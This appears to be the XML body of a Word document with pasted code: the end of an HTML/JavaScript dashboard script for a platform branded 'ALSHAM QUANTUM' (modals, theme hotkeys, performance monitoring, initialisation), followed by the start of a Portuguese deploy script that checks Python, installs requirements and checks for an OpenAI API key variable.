    <w:p w14:paraId="55A084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${Object.entries(realMetrics).map(([key, value]) =&gt; `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0C39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&lt;div class="glass-card p-3"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FF16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&lt;div class="text-xs opacity-75"&gt;${key}&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021458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&lt;div class="text-lg font-bold orbitron"&gt;${value}&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A699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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5621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`).join('')}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365AF1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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FB91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230CAC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3842FD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 justify-end"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D151D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&lt;button onclick="closeModal()" class="btn"&gt;Close Neural Interface&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1504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776342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`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F6C29B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56948A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closeBtn = modal.querySelector('button');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9F9F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(closeBtn) closeBtn.focus();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AA0385" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7655E9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(window.quantumSoundDesign) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E8A1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window.quantumSoundDesign.play('success');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F87F6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4E03A308" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C9241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 catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F8CB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console.error('Error loading agent data:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1096D3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body.innerHTML = `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054101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class="text-center py-8 text-red-400"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D819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&lt;i class="fas fa-exclamation-triangle text-2xl mb-4"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62594B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&lt;p&gt;Neural network temporarily unavailable&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B180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&lt;p class="text-sm opacity-75 mt-2"&gt;Operating in quantum simulation mode&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ABFC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&lt;button onclick="closeModal()" class="btn mt-4"&gt;Close Interface&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0B7C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52BBFF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`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1140D4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F29D4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2C216BE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AEF34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function closeModal() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B3F1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modal = document.getElementById('agent-modal');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133F48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(modal) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC322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modal.classList.remove('active');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421725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modal.setAttribute('aria-hidden', 'true');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D012F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194F0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9D8243E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F343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KEYBOARD NAVIGATION =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267271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document.addEventListener('keydown', (e) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7EE4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(e.key === 'Escape') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121CF4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closeModal();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEC06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8C717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8E1ED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themeKeys = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4EFD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'1': 'quantum-glass',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0754C8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'2': 'corporate-void',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A902B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'3': 'enterprise-azure',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EA86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'4': 'quantum-matrix',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3376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'5': 'platinum-executive'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705275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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26665A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F9D48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(themeKeys[e.key] &amp;&amp; window.quantumThemeSystem) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE522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window.quantumThemeSystem.switchTheme(themeKeys[e.key]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6469AD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52334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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7296CD10" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E45C9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QUANTUM PERFORMANCE MONITORING =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765633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class QuantumPerformanceMonitor {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F477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constructor() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A940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this.metrics = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2898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loadTime: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8061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renderTime: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043849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memoryUsage: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7560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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780B71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this.init();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0342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A0F2B58" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52FE84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init() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09383D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window.addEventListener('load', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8BF4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this.metrics.loadTime = performance.now();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D428E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console.log(`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ALSHAM QUANTUM loaded in ${this.metrics.loadTime.toFixed(2)}ms`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D52C0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7AA48AA4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1567AA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(performance.memory) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F7FF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setInterval(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790CD1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this.metrics.memoryUsage = performance.memory.usedJSHeapSize;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDB79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 10000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC0C8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57E67C9B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40473A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this.observeQuantumVitals();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079FD5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9DADC1E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C3B23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observeQuantumVitals() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DDD0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('PerformanceObserver' in window) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA6E2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lcpObserver = new PerformanceObserver((list) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703F02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entries = list.getEntries();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4EFC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lcp = entries[entries.length - 1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3AAA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console.log(`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Quantum LCP: ${lcp.startTime.toFixed(2)}ms`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB63E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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009051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lcpObserver.observe({ entryTypes: ['largest-contentful-paint'] });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA24AC8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C1BA1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fidObserver = new PerformanceObserver((list) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1F69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entries = list.getEntries();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F193E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entries.forEach(entry =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368F91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console.log(`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Quantum FID: ${entry.processingStart - entry.startTime}ms`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBD0E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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF419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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7418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fidObserver.observe({ entryTypes: ['first-input'] });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ECCF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5EA03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D8362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4709B4B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F027E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INITIALIZATION =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCAA0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document.addEventListener('DOMContentLoaded', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0189DC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console.log('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Initializing ALSHAM QUANTUM Enterprise Platform...');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CAFD05" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="265961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Initialize quantum systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E057D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window.quantumSoundDesign = new QuantumSoundDesign();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439D67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window.quantumThemeSystem = new QuantumThemeSystem();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0886AD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window.businessInsights = new BusinessInsights();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CAEE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window.quantumWebSocketManager = new QuantumWebSocketManager();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512EA3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window.quantumPerformanceMonitor = new QuantumPerformanceMonitor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054E4CEF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27EA2A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Initialize quantum particles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6A0A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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481599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window.quantumParticlesSystem = new QuantumParticlesSystem();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB150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 catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50693B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console.warn('Three.js not available, quantum particles disabled:', error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7017B0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7E6D45B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D6D9B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Initialize neural chart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EA9B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initializeNeuralChart();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436428F9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7484B7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Add touch optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227F41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document.addEventListener('touchstart', () =&gt; {}, { passive: true });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070CFD38" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="185AFE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Add quantum sound interactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DC6E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document.addEventListener('click', (e) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247D95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(e.target.matches('button, .btn, .card-3d, .theme-btn, .event-item')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D7F9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(window.quantumSoundDesign) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7878B4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window.quantumSoundDesign.play('click');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C34F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64CE03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4E604E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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA1F638" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="636F9E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document.addEventListener('mouseenter', (e) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C31E3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(e.target.matches('.card-3d, .theme-btn, button, .btn')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31032E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(window.quantumSoundDesign) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622498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window.quantumSoundDesign.play('hover');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E8DA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701BBC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30A3E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}, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0E7C90" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25CD9C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Handle visibility changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF2C0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document.addEventListener('visibilitychange', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE0BE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(document.hidden) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF95C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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📱</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ALSHAM QUANTUM minimized');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B66AA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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C94B3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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📱</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ALSHAM QUANTUM active');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC32F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5E00E0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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B3E993" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1490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console.log('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ALSHAM QUANTUM Enterprise Platform initialized successfully!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF898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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FE6493" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="076536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CLEANUP =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EC1A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window.addEventListener('beforeunload', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCF92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(window.quantumWebSocketManager) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123759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window.quantumWebSocketManager.destroy();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706FDC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E7C7B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(window.quantumParticlesSystem) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A31E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window.quantumParticlesSystem.destroy();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C5D6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4B3B8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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC48481" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="271C3D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ERROR HANDLING =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016B77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window.addEventListener('error', (e) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C4D1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console.error('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ALSHAM QUANTUM error:', e.error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23987B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BBAEA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Less intrusive error handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCB63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console.warn('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Quantum error recovery protocols activated');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C2A3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317E2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(window.quantumSoundDesign) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464767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window.quantumSoundDesign.play('error');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C654E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58D1B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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61759DA1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="782D02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QUANTUM READY EVENT =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C020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document.dispatchEvent(new CustomEvent('quantumReady', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B9CD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detail: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D06B9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version: '2.0.0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66092C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timestamp: Date.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F5ED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system: 'ALSHAM QUANTUM',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB66A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company: 'ALSHAM GLOBAL COMMERCE',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3001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features: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC0EB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'PWA Enterprise',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1022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'Offline Support',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480832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'Push Notifications',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7648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'Quantum Particles',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCA9C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'Real-time Neural Data',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E65C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'Quantum Theme System',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4082AE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'Enterprise Sound Design',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707EFD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'Performance Monitoring',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D73F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'Neural Network Integration'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AAEC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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0642F1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14A32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}));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26909A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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149313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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E38A459" w14:textId="172E2D86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&lt;/html&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343C49A4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EF04923" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FCEE675" w14:textId="540B7463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deploy.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C96CA5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E3EBE6F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781C9A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# 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SUNA-ALSHAM Deploy Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C522D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Gerado automaticamente em 2025-07-22T11:36:54.909873</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ACFECE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B821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echo "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Iniciando deploy do SUNA-ALSHAM..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDC491B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19ED61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Verificar Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B9E4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python3 --version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707222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[ $? -ne 0 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B0D7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echo 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Python 3 n</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ã</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>o encontrado"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4801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exit 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0161CD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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200BE90B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F807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Instalar dependências</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5194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echo "</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📦</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Instalando dependências..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCC9F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pip3 install -r requirements_production.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0A637D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F978E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Verificar variáveis de ambiente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744E00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echo "</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Verificando variáveis de ambiente..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F76FB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[ -z "$OPENAI_API_KEY" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42979F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echo "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OPENAI_API_KEY não configurada"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDB09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fi</w:t>
      </w:r>
    </w:p>
